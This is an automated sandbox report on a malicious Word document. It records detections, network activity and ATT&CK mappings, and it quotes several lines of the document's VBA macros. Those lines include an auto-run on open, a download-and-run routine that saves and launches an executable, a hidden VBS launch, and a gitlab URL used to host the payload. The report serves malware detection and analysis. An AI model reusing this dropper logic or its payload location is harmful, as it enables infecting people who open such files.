Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
q9JZUaS1Gy.doc

Overview

General Information

Sample name:q9JZUaS1Gy.doc
renamed because original name is a hash value
Original sample name:0f53abadce48014ec8ea5458af9b732ed1ea6d612b54b261a0e60928e36e86f1.doc
Analysis ID:1590807
MD5:f8de9b2f8b9088be3dda1985fe7b20c3
SHA1:edba0fb7fdd51294bf183a8d7ab8992bb1762ff5
SHA256:0f53abadce48014ec8ea5458af9b732ed1ea6d612b54b261a0e60928e36e86f1
Tags:app8490744dochko247blackuser-JAMESWT_MHT
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Machine Learning detection for sample
Detected non-DNS traffic on DNS port
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains an embedded VBA which might only executes on specific systems (country or language check)
Document contains embedded VBA macros
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (unknown TCP traffic)

Classification

  • System is w10x64
  • WINWORD.EXE (PID: 3356 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: q9JZUaS1Gy.docVirustotal: Detection: 53%Perma Link
Source: q9JZUaS1Gy.docReversingLabs: Detection: 39%
Source: q9JZUaS1Gy.docJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: global trafficDNS query: name: 15.164.165.52.in-addr.arpa
Source: global trafficTCP traffic: 192.168.2.5:52557 -> 162.159.36.2:53
Source: global trafficTCP traffic: 162.159.36.2:53 -> 192.168.2.5:52557
Source: global trafficTCP traffic: 192.168.2.5:52557 -> 162.159.36.2:53
Source: global trafficTCP traffic: 162.159.36.2:53 -> 192.168.2.5:52557
Source: global trafficTCP traffic: 192.168.2.5:52557 -> 162.159.36.2:53
Source: global trafficTCP traffic: 162.159.36.2:53 -> 192.168.2.5:52557
Source: global trafficTCP traffic: 192.168.2.5:52557 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.5:52557 -> 162.159.36.2:53
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
Source: q9JZUaS1Gy.docString found in binary or memory: https://gitlab.com/app8490744/updatesa/-/raw/main/up$
Source: q9JZUaS1Gy.docString found in binary or memory: https://gitlab.com/app8490744/updatesa/-/raw/main/up$v

System Summary

barindex
Source: q9JZUaS1Gy.docOLE, VBA macro line: shell.Run """" & savePath & """", 1, False
Source: q9JZUaS1Gy.docOLE, VBA macro line: shell.ShellExecute vbsFilePath, "", "", "open", 0
Source: q9JZUaS1Gy.docOLE, VBA macro line: savePath = Environ("USERPROFILE") & "\Documents\example.exe" ' u?ng d?n luu file
Source: q9JZUaS1Gy.docOLE, VBA macro line: Set shell = CreateObject("WScript.Shell")
Source: q9JZUaS1Gy.docOLE, VBA macro line: Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
Source: q9JZUaS1Gy.docOLE, VBA macro line: Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
Source: q9JZUaS1Gy.docOLE, VBA macro line: Private Declare PtrSafe Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
Source: q9JZUaS1Gy.docOLE, VBA macro line: Private Declare PtrSafe Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
Source: q9JZUaS1Gy.docOLE, VBA macro line: Private Declare PtrSafe Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
Source: q9JZUaS1Gy.docOLE, VBA macro line: Private Declare Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
Source: q9JZUaS1Gy.docOLE, VBA macro line: Private Declare Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
Source: q9JZUaS1Gy.docOLE, VBA macro line: Private Declare Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
Source: q9JZUaS1Gy.docOLE, VBA macro line: vbsFilePath = Environ("USERPROFILE") & "\Documents\WindowServices.vbs"
Source: q9JZUaS1Gy.docOLE, VBA macro line: shell.ShellExecute vbsFilePath, "", "", "open", 0
Source: VBA code instrumentationOLE, VBA macro: Module Module2, Function DownloadAndRunEXE, String environ: savePath = Environ("USERPROFILE") & "\Documents\example.exe"Name: DownloadAndRunEXE
Source: VBA code instrumentationOLE, VBA macro: Module Module2, Function DownloadAndRunEXE, String wscript: Set shell = CreateObject("WScript.Shell")Name: DownloadAndRunEXE
Source: VBA code instrumentationOLE, VBA macro: Module ViewSession, Function ikwiwiejs_19293_Ade, String environ: vbsFilePath = Environ("USERPROFILE") & "\Documents\WindowServices.vbs"Name: ikwiwiejs_19293_Ade
Source: VBA code instrumentationOLE, VBA macro: Module ViewSession, Function ikwiwiejs_19293_Ade, String shellexecute: shell.ShellExecute vbsFilePath, "", "", "open", 0Name: ikwiwiejs_19293_Ade
Source: VBA code instrumentationOLE, VBA macro: Module Module3, Function pvCryptoAesCtrInit, String ObjectLength
Source: VBA code instrumentationOLE, VBA macro: Module Module3, Function pvCryptoAesCtrInit, String HashDigestLength
Source: q9JZUaS1Gy.docStream path 'Macros/VBA/Module2' : found possibly 'XMLHttpRequest' functions response, responsetext, status, open, send
Source: VBA code instrumentationOLE, VBA macro: Module Module2, Function GetDataFromURL, found possibly 'XMLHttpRequest' functions response, responsetext, status, open, sendName: GetDataFromURL
Source: q9JZUaS1Gy.docOLE, VBA macro line: Private Sub Document_Open()
Source: VBA code instrumentationOLE, VBA macro: Module ksksksksksksks, Function Document_OpenName: Document_Open
Source: q9JZUaS1Gy.docOLE indicator, VBA macros: true
Source: classification engineClassification label: mal76.expl.evad.winDOC@2/2@1/0
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\Desktop\~$JZUaS1Gy.docJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{0E336B0E-187E-4AAD-A00F-3A607CC53344} - OProcSessId.datJump to behavior
Source: q9JZUaS1Gy.docOLE indicator, Word Document stream: true
Source: q9JZUaS1Gy.docOLE document summary: title field not present or empty
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: q9JZUaS1Gy.docVirustotal: Detection: 53%
Source: q9JZUaS1Gy.docReversingLabs: Detection: 39%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InprocServer32Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEWindow found: window name: SysTabControl32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEWindow detected: Number of UI elements: 13
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEWindow detected: Number of UI elements: 13
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior

Data Obfuscation

barindex
Source: q9JZUaS1Gy.docStream path 'Macros/VBA/Module3' : High number of GOTO operations
Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Module3Name: Module3
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: q9JZUaS1Gy.docStream path 'Macros/VBA/Module3' : , ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVa
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: q9JZUaS1Gy.docOLE indicator, VBA stomping: true
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information52
Scripting
Valid Accounts2
Exploitation for Client Execution
52
Scripting
1
Process Injection
1
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System1
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Obfuscated Files or Information
Boot or Logon Initialization Scripts1
Process Injection
LSASS Memory1
File and Directory Discovery
Remote Desktop ProtocolData from Removable Media11
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information
Security Account Manager1
System Information Discovery
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
q9JZUaS1Gy.doc53%VirustotalBrowse
q9JZUaS1Gy.doc39%ReversingLabsScript-Macro.Trojan.Amphitryon
q9JZUaS1Gy.doc100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
s-part-0017.t-0009.fb-t-msedge.net
13.107.253.45
truefalse
    high
    15.164.165.52.in-addr.arpa
    unknown
    unknownfalse
      high
      NameSourceMaliciousAntivirus DetectionReputation
      https://gitlab.com/app8490744/updatesa/-/raw/main/up$q9JZUaS1Gy.docfalse
        high
        https://gitlab.com/app8490744/updatesa/-/raw/main/up$vq9JZUaS1Gy.docfalse
          high
          No contacted IP infos
          Joe Sandbox version:42.0.0 Malachite
          Analysis ID:1590807
          Start date and time:2025-01-14 15:17:53 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 11m 12s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:defaultwindowsofficecookbook.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:12
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • GSI enabled (VBA)
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:q9JZUaS1Gy.doc
          renamed because original name is a hash value
          Original Sample Name:0f53abadce48014ec8ea5458af9b732ed1ea6d612b54b261a0e60928e36e86f1.doc
          Detection:MAL
          Classification:mal76.expl.evad.winDOC@2/2@1/0
          Cookbook Comments:
          • Found application associated with file extension: .doc
          • Max analysis timeout: 600s exceeded, the analysis took too long
          • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, sppsvc.exe, UserOOBEBroker.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, WmiPrvSE.exe
          • Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.113.194.132, 52.109.32.7, 20.189.173.6, 2.23.242.162, 2.20.245.225, 2.20.245.216, 52.111.243.43, 52.111.243.41, 52.111.243.42, 52.111.243.40, 40.126.32.72, 13.107.253.45, 4.245.163.56, 23.1.237.91, 20.190.159.4, 52.165.164.15
